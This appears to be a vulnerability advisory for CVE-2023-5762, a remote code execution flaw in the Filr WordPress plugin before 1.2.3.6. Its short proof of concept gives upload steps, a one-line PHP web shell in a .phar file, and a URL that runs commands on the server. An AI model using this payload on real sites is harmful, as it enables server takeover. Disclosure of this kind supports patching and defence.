Filr – Secure document library < 1.2.3.6 – Author+ RCE via file upload with phar ext | CVE 2023-5762 | Plugin Vulnerabilities

Description

The plugin is vulnerable from an RCE (Remote Code Execution) vulnerability, which allows the operating system to execute commands and fully compromise the server on behalf of a user with Author-level privileges.

Proof of Concept

1) Go to main dashboard of plugin http://your_site/wordpress/wp-admin/edit.php?post_type=filr
2) Add new File
3) Upload file with extention "phar" and malicious code inside, like <?php system($_GET['cmd]'); ?>
4) Go to http://your_site/wordpress/wp-content/uploads/filr/{number_of_post}/cmd.phar?cmd=ps+aux (or pwd or id) and do RCE

Affects Plugins

filr-protection

Fixed in 1.2.3.6

References

CVE

Classification

Type

RCE

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Dmtirii Ignatyev

Submitter

Dmtirii Ignatyev

Submitter website

https://blog.cleantalk.org

Verified

Yes

WPVDB ID

6ad99725-eccc-4b61-bce2-668b62619deb

Timeline

Publicly Published

2023-11-13 (about 6 months ago)

Added

2023-11-13 (about 6 months ago)

Last Updated

2023-11-13 (about 6 months ago)

Other

Published

Title

Published

2015-03-18

Title

Ajax Search Lite < 3.11 - Authenticated RCE

Published

2024-01-03

Title

LearnPress < 4.2.5.8 - Unauthenticated Command Injection

Published

2014-08-01

Title

Hungred Post Thumbnail - hpt_file_upload.php File Upload PHP Code Execution

Published

2022-11-08

Title

Theme-Demo-Importer < 1.1.1 - Admin+ Arbitrary File Upload

Published

2014-08-01

Title

PHP Shell Plugin